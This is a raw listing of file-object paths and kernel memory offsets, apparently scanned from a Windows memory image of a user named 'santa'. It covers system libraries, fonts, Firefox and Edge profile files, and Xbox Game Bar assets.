\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData 216 +0x918b76c5b2a0 \Windows\Fonts\times.ttf 216 +0x918b76c5b430 \Windows\SoftwareDistribution\DataStore\Logs\edbtmp.log 216 +0x918b76c5b5c0 \Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 216 +0x918b76c5b750 \Users\santa\AppData\Local\Microsoft\Windows\WebCache\V01tmp.log 216 +0x918b76c5b8e0 \Windows\System32\en-US\wshqos.dll.mui 216 +0x918b76c5ba70 \Sessions\1\AppContainerNamedObjects\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\1821068571-1793888307-623627345-1529106238 216 +0x918b76c5bc00 \Windows\System32\MicrosoftEdgeSH.exe 216 +0x918b76c5bd90 \Windows\Registration\R000000000006.clb 216 +0x918b76c5c0b0 \Endpoint 216 +0x918b76c5c240 \Windows\System32\CapabilityAccessManager.dll 216 +0x918b76c5c3d0 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b76c5c6f0 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Xbox.Experimentation.dll 216 +0x918b76c5c880 \Windows\SysWOW64\InputHost.dll 216 +0x918b76c5ca10 \Windows\System32\oleaut32.dll 216 +0x918b76c5cba0 \$Directory 216 +0x918b76c5cd30 \Endpoint 216 +0x918b76c5cec0 \Windows\System32\cdprt.dll 216 +0x918b76c5d1e0 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b76c5d500 \Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 216 +0x918b76c5d820 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db 216 +0x918b76c5d9b0 \Windows 216 +0x918b76c5db40 \Program Files (x86)\Mozilla Firefox 216 +0x918b76c5e180 \Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.30_none_210ac8966535eaa7 216 +0x918b76c5e4a0 \Windows\Fonts\arial.ttf 216 +0x918b76c5e630 \Windows\System32\cellulardatacapabilityhandler.dll 216 +0x918b76c5e950 \Program Files (x86)\Mozilla Firefox 216 +0x918b76c5eae0 \Windows\System32\C_1255.NLS 216 +0x918b76c5ec70 \Windows\System32\EdgeContent.dll 216 +0x918b76c5f120 \Windows\System32\Windows.System.Profile.SystemId.dll 216 +0x918b76c5f2b0 \Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll 216 +0x918b76c5f5d0 \gecko.4576.3988.15626751180869662404 216 +0x918b76c5f760 \Windows\System32\Windows.System.UserProfile.DiagnosticsSettings.dll 216 +0x918b76c5f8f0 \Program Files\Common Files\microsoft shared\ink\tiptsf.dll 216 +0x918b76c5fa80 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db 216 +0x918b76c600c0 \Sessions\1\AppContainerNamedObjects\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\3513710562-3729412521-1863153555-1462103995 216 +0x918b76c60250 \gecko.4576.3988.15626751180869662404 216 +0x918b76c603e0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\cache\caches.sqlite-wal 216 +0x918b76c60570 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\cache\caches.sqlite-shm 216 +0x918b76c60890 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\SegXboxGB.ttf 216 +0x918b76c60a20 \Windows\SysWOW64\pnrpnsp.dll 216 +0x918b76c60bb0 \Windows\SysWOW64\twinapi.appcore.dll 216 +0x918b76c60d40 \Windows\Fonts\StaticCache.dat 216 +0x918b76c60ed0 \Windows\System32\en-US\user32.dll.mui 216 +0x918b76c611f0 \gecko.4576.3988.11432683184268803580 216 +0x918b76c61380 \$Directory 216 +0x918b76c61510 \Endpoint 216 +0x918b76c616a0 \Users\santa\AppData\Local\Microsoft\Windows\Safety\edge\local\local\cache 216 +0x918b76c619c0 \Windows\Fonts\tahoma.ttf 216 +0x918b76c61b50 \wkssvc 216 +0x918b76c61ce0 \$Directory 216 +0x918b76c61e70 \CMApi 216 +0x918b76c624b0 \Windows\System32\svchost.exe 216 +0x918b76c62640 \Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 216 +0x918b76c62960 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\ActivationStore.dat 216 +0x918b76c62af0 \gecko.4576.3988.11432683184268803580 216 +0x918b76c62c80 \Windows\System32\drivers\monitor.sys 216 +0x918b76c62e10 \Windows\System32\UIRibbonRes.dll 216 +0x918b76c63130 \Windows\System32\MicrosoftEdgeCP.exe 216 +0x918b76c632c0 \CMApi 216 +0x918b76c63450 \Windows\Prefetch\DLLHOST.EXE-B331F1D0.pf 216 +0x918b76c635e0 \gecko.4576.3988.7509070130796334379 216 +0x918b76c63900 \Windows\Fonts\seguisb.ttf 216 +0x918b76c63a90 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b76c63c20 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite 216 +0x918b76c63db0 \ProgramData\Microsoft\Windows\OneSettings\UsoSettings.json 216 +0x918b76c640d0 \Windows\Fonts\arial.ttf 216 +0x918b76c64260 \Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 216 +0x918b76c64580 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\BS_Static_Regular.ttf 216 +0x918b76c64710 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite-wal 216 +0x918b76c64a30 \Users\santa\Pictures\cool-santa-claus.jpg 216 +0x918b76c64bc0 \$Directory 216 +0x918b76c64d50 \ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpavdlta.vdm 216 +0x918b76c64ee0 \Windows\System32\en-US\ApplicationFrame.dll.mui 216 +0x918b76c65390 \Windows\SysWOW64\BCP47mrm.dll 216 +0x918b76c65520 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b76c656b0 \$Directory 216 +0x918b76c65840 \Windows\System32\appinfo.dll 216 +0x918b76c659d0 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b76c65b60 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\SegXbox2.ttf 216 +0x918b76c65cf0 \Windows\Fonts\seguiemj.ttf 216 +0x918b76c65e80 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\BS_Static_Regular.ttf 216 +0x918b76c661a0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\protections.sqlite 216 +0x918b76c66330 \Windows\System32\winevt\Logs\Microsoft-Windows-WorkFolders%4WHC.evtx 216 +0x918b76c664c0 \Windows\Prefetch\WUAUCLT.EXE-4A7CF88B.pf 216 +0x918b76c66650 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite-wal 216 +0x918b76c66970 \Windows\SysWOW64\apphelp.dll 216 +0x918b76c66b00 \$Directory 216 +0x918b76c66c90 \$Directory 216 +0x918b76c66e20 \Windows\SysWOW64\Windows.System.Diagnostics.Telemetry.PlatformTelemetryClient.dll 216 +0x918b76c67140 \Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 216 +0x918b76c672d0 \Windows\System32\sendmail.dll 216 +0x918b76c67460 \Windows\Registration\R000000000006.clb 216 +0x918b76c67910 \Windows\SysWOW64\wdmaud.drv 216 +0x918b76c67c30 \Program Files\WindowsApps\Microsoft.SkypeApp_15.108.3205.0_x64__kzf8qxf38zg5c\Skype\SkypeContext.dll 216 +0x918b76c680e0 \Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 216 +0x918b76c68270 \srvsvc 216 +0x918b76c68400 \Windows\System32\en-US\Windows.Web.dll.mui 216 +0x918b76c68590 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b76c68720 \Windows\SysWOW64\mskeyprotect.dll 216 +0x918b76c68a40 \Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.401.765.0.exe 216 +0x918b76c68bd0 \ProgramData\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\Cache\465f7e52ad88feb7_COM15.dat 216 +0x918b76c68d60 \Windows\System32\en-US\Windows.Web.dll.mui 216 +0x918b76c68ef0 \Windows\System32\utcutil.dll 216 +0x918b76c69080 \Windows\System32 216 +0x918b76c693a0 \Windows\SysWOW64\atlthunk.dll 216 +0x918b76c699e0 \Windows\SysWOW64\ksuser.dll 216 +0x918b76c69d00 \Windows\Fonts\seguiemj.ttf 216 +0x918b76c6a1b0 \gecko.4576.3988.3315572846900535200 216 +0x918b76c6a4d0 \Windows\Fonts\cambriab.ttf 216 +0x918b76c6aca0 \gecko.4576.3988.11800597154050836485 216 +0x918b771021e0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\formhistory.sqlite 216 +0x918b77102370 \gecko.4576.3988.6592836978968939771 216 +0x918b77102500 \CMApi 216 +0x918b77102690 \Windows\System32\en-US\urlmon.dll.mui 216 +0x918b77102820 \ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpengine.dll 216 +0x918b77102b40 \gecko.4576.3988.17650197844353459366 216 +0x918b77102cd0 \Windows\System32\EhStorAPI.dll 216 +0x918b77102e60 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b77103180 \CMApi 216 +0x918b77103310 \LOCAL\cubeb-pipe-4576-6 216 +0x918b771034a0 \LOCAL\cubeb-pipe-4576-6 216 +0x918b77103630 \Program Files (x86)\Mozilla Firefox 216 +0x918b771037c0 \Windows\System32\en-US\wosc.dll.mui 216 +0x918b77103950 \Device\HarddiskVolume4\Windows\System32\config\COMPONENTS{fd9a35c3-49fe-11e9-aa2c-248a07783950}.TM 216 +0x918b77103ae0 \Windows\System32\en-US\Windows.UI.dll.mui 216 +0x918b77103c70 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b77103e00 \gecko.4576.3988.17650197844353459366 216 +0x918b77104120 \Windows\System32\usocoreworker.exe 216 +0x918b771042b0 \Program Files (x86)\Mozilla Firefox 216 +0x918b77104440 \Windows\System32\MpSigStub.exe 216 +0x918b771045d0 \gecko.4576.3988.6592836978968939771 216 +0x918b77104a80 \CMApi 216 +0x918b77104c10 \Windows 216 +0x918b77104da0 \Windows\System32\usocoreps.dll 216 +0x918b771050c0 \Windows\System32\MpSigStub.exe 216 +0x918b77105250 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe 216 +0x918b77105570 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-1046918562-1299961717-1331875240-1001-MergedResources-1.pri 216 +0x918b77105700 \Device\HarddiskVolume4\Windows\System32\config\COMPONENTS{fd9a35c3-49fe-11e9-aa2c-248a07783950}.TM 216 +0x918b77105a20 \Windows\Fonts\times.ttf 216 +0x918b77105bb0 \Windows\System32 216 +0x918b77105d40 \CMApi 216 +0x918b77105ed0 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\xComms.dll 216 +0x918b771061f0 \$Directory 216 +0x918b77106380 \ProgramData\USOPrivate\UpdateStore\UpdateCspStore.xml 216 +0x918b77106510 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\cache\caches.sqlite 216 +0x918b771066a0 \Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll 216 +0x918b77106830 \LOCAL\cubeb-pipe-4576-12 216 +0x918b771069c0 \Users\santa\Pictures\wallpaper.png 216 +0x918b77106ce0 \Windows\System32 216 +0x918b77106e70 \$Directory 216 +0x918b77107190 \Windows\Fonts\segoeui.ttf 216 +0x918b77107320 \Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy 216 +0x918b771074b0 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\resources.pri 216 +0x918b77107640 \$Directory 216 +0x918b771077d0 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b77107960 \Windows\System32\en-US\kernel32.dll.mui 216 +0x918b77107af0 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b77107c80 \Windows\System32\SearchFilterHost.exe 216 +0x918b77107e10 \LOCAL\cubeb-pipe-4576-12 216 +0x918b77108130 \Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 216 +0x918b771082c0 \Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Assets\NewNotePlaceholder-light.png 216 +0x918b77108450 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\gamingtelemetrynuget.dll 216 +0x918b771085e0 \LOCAL\cubeb-pipe-4576-8 216 +0x918b77108900 \Windows\System32\shacctprofile.dll 216 +0x918b77108c20 \Windows\System32\en-US\bcrypt.dll.mui 216 +0x918b77108db0 \$Directory 216 +0x918b771090d0 \CMApi 216 +0x918b771093f0 \gecko.4576.3988.7272797111254493628 216 +0x918b77109580 \Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe 216 +0x918b77109710 \Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe 216 +0x918b771098a0 \Sessions\1\AppContainerNamedObjects\S-1-15-2-350187224-1905355452-1037786396-3028148496-2624191407-3283318427-1255436723 216 +0x918b77109a30 \Windows\Registration\R000000000006.clb 216 +0x918b77109d50 \Program Files (x86)\Mozilla Firefox 216 +0x918b77109ee0 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b7710a200 \Program Files (x86)\Mozilla Firefox 216 +0x918b7710a390 \gecko.4576.3988.7272797111254493628 216 +0x918b7710a520 \LOCAL\cubeb-pipe-4576-8 216 +0x918b7710a6b0 \$Directory 216 +0x918b7710a840 \Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Assets\SearchPlaceholder-light.png 216 +0x918b7710a9d0 \Windows\System32\gamingtcui.dll 216 +0x918b7710ab60 \gecko.4576.3988.2835789630577416850 216 +0x918b7710acf0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{0EAA5A01-7A70-45D5-9133-2575E4531A76}.catalogItem 216 +0x918b7710ae80 \CMApi 216 +0x918b7710b1a0 \Users\santa\AppData\Local\Microsoft\GameDVR\KnownGameList.bin 216 +0x918b7710b330 \Windows 216 +0x918b7710b4c0 \Windows\System32\en-US\uxtheme.dll.mui 216 +0x918b7710b650 \gecko.4576.3988.2835789630577416850 216 +0x918b7710b7e0 \Windows\System32\WorkFoldersShell.dll 216 +0x918b7710b970 \Windows\System32\WaaSAssessment.dll 216 +0x918b7710bb00 \CMApi 216 +0x918b7710be20 \Program Files\WindowsApps\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-1046918562-1299961717-1331875240-1001-MergedResources-1.pri 216 +0x918b7710c140 \Windows\apppatch\sysmain.sdb 216 +0x918b7710c460 \Windows\System32\en-US\powrprof.dll.mui 216 +0x918b7710c5f0 \Users\santa\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\dd7c3b1adb1c168b.automaticDestinations-ms 216 +0x918b7710c780 \Windows\System32\en-US\SHCore.dll.mui 216 +0x918b7710c910 \Windows\System32\en-US\ole32.dll.mui 216 +0x918b7710caa0 \MmThread 216 +0x918b7710cc30 \$Directory 216 +0x918b7710cdc0 \Windows\System32\en-US\wsock32.dll.mui 216 +0x918b7710d0e0 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b7710d270 \Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Assets\SignInUpsellCloud.png 216 +0x918b7710d400 \ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpasdlta.vdm 216 +0x918b7710d590 \Windows\System32\en-US\shell32.dll.mui 216 +0x918b7710d720 \CMNotify 216 +0x918b7710d8b0 \Windows\System32\en-US\ws2_32.dll.mui 216 +0x918b7710da40 \Windows\System32\en-US\shlwapi.dll.mui 216 +0x918b7710dbd0 \Windows\Temp\MpSigStub.log 216 +0x918b7710def0 \Program Files\desktop.ini 216 +0x918b7710e210 \Windows\System32\MicrosoftEdgeSH.exe 216 +0x918b7710e3a0 \$Directory 216 +0x918b7710e530 \$Directory 216 +0x918b7710e6c0 \$Directory 216 +0x918b7710e9e0 \Windows\Fonts\segoeui.ttf 216 +0x918b7710eb70 \$PrepareToShrinkFileSize 216 +0x918b7710ed00 \Windows\System32\en-US\Windows.Web.dll.mui 216 +0x918b7710ee90 \Windows\System32\en-US\DWrite.dll.mui 216 +0x918b7710f1b0 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftEdge_44.18362.1.0_neutral__8wekyb3d8bbwe\ActivationStore.dat.LOG2 216 +0x918b7710f340 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.LOG2 216 +0x918b7710f4d0 \Windows\System32\ProductEnumerator.dll 216 +0x918b7710f660 \Windows\System32\browser_broker.exe 216 +0x918b7710f7f0 \Windows\Registration\R000000000006.clb 216 +0x918b7710f980 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\RecoveryStore.{08A1B7B6-8720-45C7-9F53-5DE13131642A}.dat 216 +0x918b7710fb10 \$ConvertToNonresident 216 +0x918b7710fca0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\{9FE582AC-0714-46BC-86A5-97F8760585AD}.dat 216 +0x918b7710fe30 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DF01C4B692F42374F5.TMP 216 +0x918b77110150 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat 216 +0x918b771102e0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.LOG1 216 +0x918b77110470 \Windows\Prefetch\RUNTIMEBROKER.EXE-0F75CE2A.pf 216 +0x918b77110600 \Windows\Prefetch\SEARCHFILTERHOST.EXE-10E4267C.pf 216 +0x918b77110790 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DFF9459C1E5AD81E6B.TMP 216 +0x918b77110ab0 \Users\santa\AppData\Roaming\Microsoft\Windows\Recent\ms-gamingoverlay--kglcheck-.lnk 216 +0x918b77110c40 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.jfm 216 +0x918b77110dd0 \Windows\System32\RuntimeBroker.exe 216 +0x918b771110f0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log 216 +0x918b77111280 \srvsvc 216 +0x918b77111410 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftEdge_44.18362.1.0_neutral__8wekyb3d8bbwe\ActivationStore.dat.LOG1 216 +0x918b771115a0 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftEdge_44.18362.1.0_neutral__8wekyb3d8bbwe\ActivationStore.dat 216 +0x918b77111730 \Windows\System32 216 +0x918b771118c0 \Sessions\0\AppContainerNamedObjects\S-1-15-2-325582940-1778951665-2213520192-4268324128-1481672235-1589908001-3634219278 216 +0x918b77111be0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb 216 +0x918b77111d70 \Windows\System32\Microsoft\Protect\S-1-5-18\Preferred 216 +0x918b77112090 \Windows\WinSxS\Manifests 216 +0x918b77112220 \Windows\Registration\R000000000006.clb 216 +0x918b77112540 \Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.30_none_788560eb0ef1f3b0\msdelta.dll 216 +0x918b771126d0 \Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe 216 +0x918b77112860 \Windows\System32\en-US\sppc.dll.mui 216 +0x918b771129f0 \Users\santa\Pictures\desktop.ini 216 +0x918b77112b80 \$Directory 216 +0x918b77112d10 \Endpoint 216 +0x918b77112ea0 \Sessions\0\AppContainerNamedObjects\S-1-15-2-3849594370-768312209-1569529313-3852718675-3346578718-723854219-830068492 216 +0x918b771134e0 \Windows\System32\en-US\webauthn.dll.mui 216 +0x918b77113800 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b77113990 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b77113cb0 \Windows\System32\en-US\winmm.dll.mui 216 +0x918b77113e40 \$PrepareToShrinkFileSize 216 +0x918b77114160 \Windows\System32 216 +0x918b771142f0 \Windows\System32\MicrosoftEdgeCP.exe 216 +0x918b77114610 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe 216 +0x918b771147a0 \Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe 216 +0x918b77114930 \Users\santa\Music\desktop.ini 216 +0x918b77114c50 \$ConvertToNonresident 216 +0x918b77114de0 \Windows\System32\en-US\edgehtml.dll.mui 216 +0x918b77115100 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b77115290 \ProgramData\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd 216 +0x918b77115420 \ProgramData\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-shm 216 +0x918b771155b0 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b77115740 \ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd 216 +0x918b771158d0 \Windows\System32\en-US\dnsapi.dll.mui 216 +0x918b77115bf0 \Windows\System32\en-US\mssvp.dll.mui 216 +0x918b77115d80 \Windows\System32\en-US\combase.dll.mui 216 +0x918b771160a0 \Windows\WinSxS 216 +0x918b77116230 \Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.30_none_210ac8966535eaa7 216 +0x918b771163c0 \srvsvc 216 +0x918b77116550 \Windows\System32\WinMetadata\Windows.UI.winmd 216 +0x918b771166e0 \Windows\System32\bcastdvr.proxy.dll 216 +0x918b77116870 \Windows\System32\Windows.WARP.JITService.exe 216 +0x918b77116a00 \CMApi 216 +0x918b77116b90 \Program Files\Windows Defender\EppManifest.dll 216 +0x918b77116d20 \Windows\System32 216 +0x918b77116eb0 \Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 216 +0x918b771171d0 \Windows\SoftwareDistribution\Download\Install 216 +0x918b771174f0 \Users\santa\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9d1f905ce5044aee.customDestinations-ms 216 +0x918b77117680 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b77117810 \ProgramData\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-wal 216 +0x918b77117b30 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b77117cc0 \Windows\System32\WinMetadata\Windows.Foundation.winmd 216 +0x918b77117e50 \Windows\System32\Windows.WARP.JITService.exe 216 +0x918b77118170 \Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 216 +0x918b77118300 \Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 216 +0x918b77118490 \Users\santa\Videos\desktop.ini 216 +0x918b77118620 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{1461CFEB-1E32-498E-AE2F-9F1708E96109}.catalogItem 216 +0x918b771187b0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{1CC81610-AA56-4B6A-AA79-9D585390D374}.catalogItem 216 +0x918b77118940 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 216 +0x918b77118ad0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{2152CE6B-9B4A-4AFF-9B49-FC05B8C26179}.catalogItem 216 +0x918b77118df0 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b77119110 \Windows\Prefetch\DLLHOST.EXE-38926D07.pf 216 +0x918b771192a0 \ProgramData\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1046918562-1299961717-1331875240-1001.pckgdep 216 +0x918b77119430 \Users\santa\Downloads\desktop.ini 216 +0x918b771195c0 \Windows\System32\en-US\combase.dll.mui 216 +0x918b771198e0 \Windows\System32\WinMetadata\Windows.Foundation.winmd 216 +0x918b77119a70 \$Directory 216 +0x918b77119c00 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\XboxGameBarFT.winmd 216 +0x918b77119d90 \LOCAL\cubeb-pipe-4576-9 216 +0x918b7711a240 \Endpoint 216 +0x918b7711a3d0 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b7711a560 \Users\santa\OneDrive\desktop.ini 216 +0x918b7711a6f0 \CMNotify 216 +0x918b7711a880 \$ConvertToNonresident 216 +0x918b7711aba0 \Users\santa\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms 216 +0x918b7711ad30 \Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 216 +0x918b7711aec0 \Windows\System32\XblAuthTokenBrokerExt.dll 216 +0x918b7711b1e0 \Windows\System32\sfc.dll 216 +0x918b7711b500 \$Directory 216 +0x918b7711b690 \Windows\System32\XblAuthManager.dll 216 +0x918b7711b9b0 \Windows\System32\en-US\combase.dll.mui 216 +0x918b7711bcd0 \CMApi 216 +0x918b7711be60 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\XboxFluentGB.ttf 216 +0x918b7711c180 \$Directory 216 +0x918b7711c4a0 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b7711c630 \$Directory 216 +0x918b7711c7c0 \Users\santa\Pictures\cool-santa-claus.jpg 216 +0x918b7711c950 \Windows\WinSxS 216 +0x918b7711cae0 \Windows\System32\enterprisecsps.dll 216 +0x918b7711cc70 \Windows\System32\dmenterprisediagnostics.dll 216 +0x918b7711ce00 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_12.95.3001.0_x64__8wekyb3d8bbwe\ActivationStore.dat 216 +0x918b7711d120 \Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll 216 +0x918b7711d2b0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\datareporting\session-state.json 216 +0x918b7711d440 \Windows\System32\OpcServices.dll 216 +0x918b7711d760 \Windows\WinSxS 216 +0x918b7711da80 \Windows\System32\en-US\wintypes.dll.mui 216 +0x918b7711dc10 \Windows\System32\WinMetadata\Windows.Foundation.winmd 216 +0x918b7711dda0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{16E27F36-0B29-4012-A7C6-BA2404F04913}.catalogItem 216 +0x918b7711e0c0 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b7711e250 \$Directory 216 